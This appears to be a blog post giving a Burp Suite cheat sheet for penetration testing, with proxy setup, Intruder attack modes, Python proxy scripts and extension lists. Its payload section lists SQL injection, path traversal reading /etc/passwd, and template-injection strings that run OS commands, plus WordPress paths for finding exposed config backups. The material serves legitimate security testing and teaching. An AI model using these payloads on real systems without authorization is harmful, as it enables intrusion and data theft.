Burp Suite Cheat Sheet for Penetration Testing

Burp Suite Cheat Sheet for Penetration Testing

A comprehensive guide for security professionals and WordPress developers

1. Keyboard Shortcuts

Global Shortcuts

Shortcut Action
Ctrl+Shift+D Switch to Dashboard
Ctrl+Shift+T Switch to Target
Ctrl+Shift+P Switch to Proxy
Ctrl+Shift+I Switch to Intruder
Ctrl+Shift+R Switch to Repeater
Ctrl+Shift+O Switch to Organizer
Ctrl+Shift+E Switch to Extender
Ctrl+, Open Burp Suite preferences

Proxy Shortcuts

Shortcut Action
Ctrl+I Toggle interception on/off
Ctrl+F Forward intercepted request
Ctrl+D Drop intercepted request
Ctrl+A Select all
Ctrl+L Go to URL in browser
Ctrl+R Send to Repeater
Ctrl+T Send to Intruder
Ctrl+S Send to Scanner (Professional)

Repeater Shortcuts

Shortcut Action
Ctrl+Space Send request
Ctrl+Enter Send request
Ctrl+/ Go to previous request
Ctrl+. Go to next request
Ctrl+U URL encode selection

2. Proxy Usage

Basic Configuration

  1. Configure proxy listener:
    • Proxy > Proxy Settings > Add
    • Binding: 127.0.0.1:8080 (default)
    • Enable “Running” checkbox
  2. Configure browser proxy settings:
    • HTTP proxy: 127.0.0.1
    • Port: 8080
    • Or install “FoxyProxy” extension
  3. Install Burp CA certificate in browser:
    • Navigate to http://burp
    • Download CA certificate
    • Import into browser’s trusted certificates

Intercepting Requests

  1. Enable interception: Proxy > Intercept > “Intercept is on”
  2. Actions with intercepted requests:
    • Modify headers, parameters, or body content
    • Forward: Send request to server
    • Drop: Discard request
    • Action > Send to other Burp tools

Request History

  • View all requests in Proxy > HTTP History
  • Filter requests by domain, file type, status code, etc.
  • Right-click to send to other Burp tools

Match and Replace

  • Proxy > Options > Match and Replace
  • Automatically modify requests/responses based on regex patterns

3. Intruder Attack Types

Sniper

  • Tests each position individually with payloads
  • Positions: 3, Payloads: 10 = 30 requests
  • Best for: Testing single vulnerabilities across multiple positions
POST /login HTTP/1.1
Host: example.com

username=§admin§&password=§password§

Battering Ram

  • Uses same payload in all defined positions simultaneously
  • Positions: 3, Payloads: 10 = 10 requests
  • Best for: Testing when same input is needed in multiple fields
POST /login HTTP/1.1
Host: example.com

username=§admin§&password=§admin§

Pitchfork

  • Uses different payload sets for different positions
  • Each position gets its corresponding payload
  • Positions: 3, Payloads per set: 10 = 10 requests
  • Best for: Testing with related data (username+password pairs)
POST /login HTTP/1.1
Host: example.com

username=§username§&password=§password§

Cluster Bomb

  • Tests all combinations of payloads
  • Positions: 3, Payloads per set: 10 = 1,000 requests
  • Best for: Brute force attacks (username + password combinations)
POST /login HTTP/1.1
Host: example.com

username=§username§&password=§password§

4. Common Payloads for Attacks

SQL Injection Payloads
' OR 1=1 --
' OR '1'='1
' UNION SELECT 1,2,3 --
' UNION SELECT table_name,2,3 FROM information_schema.tables --
' UNION SELECT column_name,2,3 FROM information_schema.columns WHERE table_name='users' --
' AND (SELECT 5151 FROM (SELECT(SLEEP(5)))tImc) --
' AND extractvalue(rand(),concat(0x7e,(SELECT version()),0x7e)) --
LFI Payloads
../../../etc/passwd
....//....//....//etc/passwd
..%2F..%2F..%2Fetc%2Fpasswd
/proc/self/environ
/var/log/apache2/access.log
php://filter/convert.base64-encode/resource=/etc/passwd
SSTI (Server-Side Template Injection) Payloads
${7*7}
{{7*7}}
<%= 7*7 %>
${{7*7}}
#{7*7}
*{7*7}
${T(java.lang.Runtime).getRuntime().exec('whoami')}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
WordPress-Specific Payloads
/wp-login.php
/wp-admin
/wp-content/uploads/
/wp-content/plugins/
/wp-config.php.bak
/wp-config.php~
/?author=1
Fuzzing Payloads
# Path discovery
/admin
/backup
/config
/dev
/.git/HEAD

# File extensions
.bak
.old
.swp
.txt
.zip
.tar.gz

# WordPress files
wp-config.php
wp-content/debug.log
wp-content/uploads/

5. Repeater & Decoder Usage

Repeater

  • Send intercepted requests to Repeater: Right-click > Send to Repeater
  • Modify request and click “Send” to resend
  • View side-by-side request and response
  • Use multiple tabs for comparing responses
  • Right-click > Change request method (GET/POST)

Decoder

  1. Select text and right-click > Send to Decoder (or Ctrl+Shift+D)
  2. Encoding options:
    • URL: Convert special characters to %XX format
    • HTML: Convert characters to HTML entities
    • Base64: Encode/decode as Base64
    • ASCII Hex: Convert to/from hexadecimal
    • Hex: Raw binary data as hexadecimal
    • Gzip: Compress/decompress using gzip
    • Deflate: Compress/decompress using deflate
  3. Chained encoding/decoding:
    • “Encode as…” applies the encoding
    • “Decode as…” attempts to decode
    • Multiple encodings can be applied sequentially

6. Automating with Burp Suite API

Python Script for Sending Requests Through Burp Proxy

import requests

# Burp Proxy settings
proxies = {
    'http': 'http://127.0.0.1:8080',
    'https': 'http://127.0.0.1:8080'
}

# Custom headers
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}

# Disable SSL verification (often needed with Burp)
requests.packages.urllib3.disable_warnings()

# GET request through Burp
def send_get(url):
    response = requests.get(
        url,
        proxies=proxies,
        headers=headers,
        verify=False  # Disable SSL verification
    )
    return response

# POST request through Burp
def send_post(url, data):
    response = requests.post(
        url,
        data=data,
        proxies=proxies,
        headers=headers,
        verify=False  # Disable SSL verification
    )
    return response

# Example usage
target = "https://example.com/login"
login_data = {
    "username": "admin",
    "password": "password123"
}

response = send_post(target, login_data)
print(f"Status Code: {response.status_code}")
print(f"Response: {response.text}")

Using Burp REST API (Professional)

import requests
import json

# Burp Enterprise API settings
api_url = "http://localhost:1337/api/scan"
api_key = "your_api_key_here"

headers = {
    "Content-Type": "application/json",
    "Authorization": f"Bearer {api_key}"
}

# Create a new scan
def create_scan(target_url):
    payload = {
        "scan_configurations": [
            {"type": "NamedConfiguration", "name": "Default"}
        ],
        "urls": [target_url]
    }
    
    response = requests.post(
        api_url,
        headers=headers,
        data=json.dumps(payload)
    )
    
    return response.json()

# Get scan status
def get_scan_status(scan_id):
    response = requests.get(
        f"{api_url}/{scan_id}",
        headers=headers
    )
    
    return response.json()

# Example usage
new_scan = create_scan("https://example.com")
scan_id = new_scan["id"]
print(f"Created scan with ID: {scan_id}")

status = get_scan_status(scan_id)
print(f"Scan status: {status['scan_status']}")

7. Popular Burp Extensions

Essential Extensions

Extension Name Description
Logger++ Advanced logging of requests and responses
Autorize Authorization enforcement testing
Turbo Intruder Fast intruder with custom attack scripting
Active Scan++ Extends active scanning capabilities
CSRF Scanner Detects Cross-Site Request Forgery vulnerabilities
JWT Editor Testing and manipulating JSON Web Tokens
JSON Beautifier Pretty-prints and validates JSON content
Retire.js Identifies vulnerable JavaScript libraries
Autorize Authorization enforcement checking
Paraminer Parameter mining for hidden attack surfaces
WordPress Scanner Specific scanner for WordPress vulnerabilities

Installing Extensions

  1. Extender > BApp Store
  2. Browse or search for extensions
  3. Click “Install” button
  4. View loaded extensions under Extender > Extensions

WordPress-Specific Extensions

  • WP Plugin Scanner: Enumerates and tests WordPress plugins
  • WP Scanner Integration: Integrates WPScan results
  • CMS Scanner: Detects WordPress and plugin versions

8. Tips for Optimizing Burp Suite Performance

Memory Management

  • Increase Java heap size:
    • Burp > Project options > Misc > Java Environment
    • Maximum memory allocation: 2048 MB (adjust based on RAM)

Speed Optimization

  • Use target scope to limit requests:
    • Target > Scope > Include in scope
    • Project options > Scope > URL Scope
  • Enable “Use smart scan settings” in Scanner
  • Disable logging for file types:
    • Proxy > Options > Intercept Client Requests
    • Disable for: \.jpg$|\.gif$|\.png$|\.css$|\.js$

Efficient Workflows

  • Use Burp project files to save/restore state
  • Create and use saved scan configurations
  • Use match/replace rules for repetitive changes
  • Create macros for multi-step authentication

Resource Saving

  • Disable passive scanning if not needed
  • Configure response interception strategically
  • Set up strict scoping for large applications
  • Use Intruder’s “Number of threads” wisely (20-50 is often optimal)

WordPress-Specific Optimizations

  • Add WordPress admin paths to scope
  • Create scan profiles specific to WordPress vulnerabilities
  • Use match/replace rules to add WordPress authentication cookies automatically
Avatar photo

I'm passionate about technology, coding. I've been interested in computers since I was a kid. My favorite programming languages are python and JavaScript

Similar Posts

2 Comments

  1. Pingback: Burp Suite: The Basics - Cyber Samir

  2. You have to work on footer as well as header part to make it more attractive there is lot of space present in header part and find ads sense space at the corner which not make user or website visiter disturb

    Reply

Leave a Reply

Your email address will not be published. Required fields are marked *